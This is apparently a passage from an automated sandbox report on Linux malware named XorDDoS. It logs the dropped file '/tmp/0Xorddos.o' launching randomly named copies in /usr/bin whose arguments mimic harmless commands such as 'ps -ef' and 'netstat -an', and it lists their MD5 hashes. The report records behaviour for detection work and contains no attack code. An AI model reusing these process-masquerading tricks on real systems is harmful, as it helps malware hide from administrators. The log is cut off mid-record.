                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:40
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:/usr/bin/ysrkbnorkl "echo \"find\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:/usr/bin/ysrkbnorkl "ifconfig eth0" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:41
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:/usr/bin/ysrkbnorkl ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:42
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/ysrkbnorkl
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:4d2e235cead4f0439bc635f5a18f4bf4

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:/usr/bin/zareoppgxh bash 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:/usr/bin/zareoppgxh "ps -ef" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:46
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:/usr/bin/zareoppgxh id 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:/usr/bin/zareoppgxh id 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:/usr/bin/zareoppgxh "netstat -an" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:47
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/zareoppgxh
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:8bd739bbc978f1311f3459fae05bbefd

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:/usr/bin/cvltgpdmgk gnome-terminal 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:/usr/bin/cvltgpdmgk "ps -ef" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:/usr/bin/cvltgpdmgk ls 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:52
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:/usr/bin/cvltgpdmgk top 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:53
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:/usr/bin/cvltgpdmgk "netstat -antop" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:54
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/cvltgpdmgk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:868c28a2f8b2ca95f48a4e00a2889e23

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:21:59
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:/usr/bin/tngemhgnzk ifconfig 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:/usr/bin/tngemhgnzk "route -n" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:00
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:/usr/bin/tngemhgnzk "route -n" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:/usr/bin/tngemhgnzk "cat resolv.conf" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:/usr/bin/tngemhgnzk "grep \"A\"" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:01
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/tngemhgnzk
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:67d9c73d144874e910413a9ff5f8be8d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:/usr/bin/njezqqgxiu sh 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:/usr/bin/njezqqgxiu "route -n" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:/usr/bin/njezqqgxiu "ls -la" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:08
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/tmp/0Xorddos.o
                                                                                                                                                Arguments:n/a
                                                                                                                                                File size:625900 bytes
                                                                                                                                                MD5 hash:da818861f56900f552eb04c5e7d8c59d

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:07
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
                                                                                                                                                Arguments:/usr/bin/njezqqgxiu "ifconfig eth0" 5222
                                                                                                                                                File size:625911 bytes
                                                                                                                                                MD5 hash:1e085bdf101bbe4f3c0dd1fe168620df

                                                                                                                                                Chronological Activities


                                                                                                                                                General

                                                                                                                                                Start time:21:22:08
                                                                                                                                                Start date:14/03/2022
                                                                                                                                                Path:/usr/bin/njezqqgxiu
